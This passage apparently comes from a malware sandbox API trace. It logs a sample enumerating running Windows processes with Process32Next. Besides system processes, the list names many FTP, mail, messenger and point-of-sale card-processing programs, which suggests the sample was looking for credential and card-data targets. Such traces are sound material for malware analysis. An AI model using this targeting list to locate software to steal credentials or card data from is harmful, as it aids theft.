th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.613] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0249.615] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.617] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0249.659] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.662] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0249.664] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0249.667] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0249.669] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0249.672] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0249.674] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0249.676] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.678] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.680] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0249.682] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.684] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.685] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.687] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.689] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.691] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0249.732] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0249.735] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0249.738] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0249.740] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0249.742] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0249.745] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0249.747] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0249.749] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0249.752] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0249.754] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0249.758] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0249.760] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0249.763] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0249.766] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0249.768] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0249.850] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0249.996] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0249.999] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0250.001] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0250.005] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0250.007] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0250.011] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0250.017] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0250.021] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0250.024] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0250.031] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0250.092] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0250.094] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0250.098] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0250.100] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0250.102] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0250.105] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0250.107] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0250.109] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0250.112] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0250.114] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0250.117] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0250.119] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0250.121] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0250.125] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0250.129] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0250.131] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0250.133] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0250.135] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0250.138] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0250.140] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0250.142] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0250.144] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0250.146] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0250.176] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0250.179] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0250.182] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0250.186] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0250.188] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0250.189] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0250.195] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0250.197] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0250.199] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0250.201] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0250.203] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0250.204] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.207] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0250.209] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.211] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.214] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0250.217] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: 